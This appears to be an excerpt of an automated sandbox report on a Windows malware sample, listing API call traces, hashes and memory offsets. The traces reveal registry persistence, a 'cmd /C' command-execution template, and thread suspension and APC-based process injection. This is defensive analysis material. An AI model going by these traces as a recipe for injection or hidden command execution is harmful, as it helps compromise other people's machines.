  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
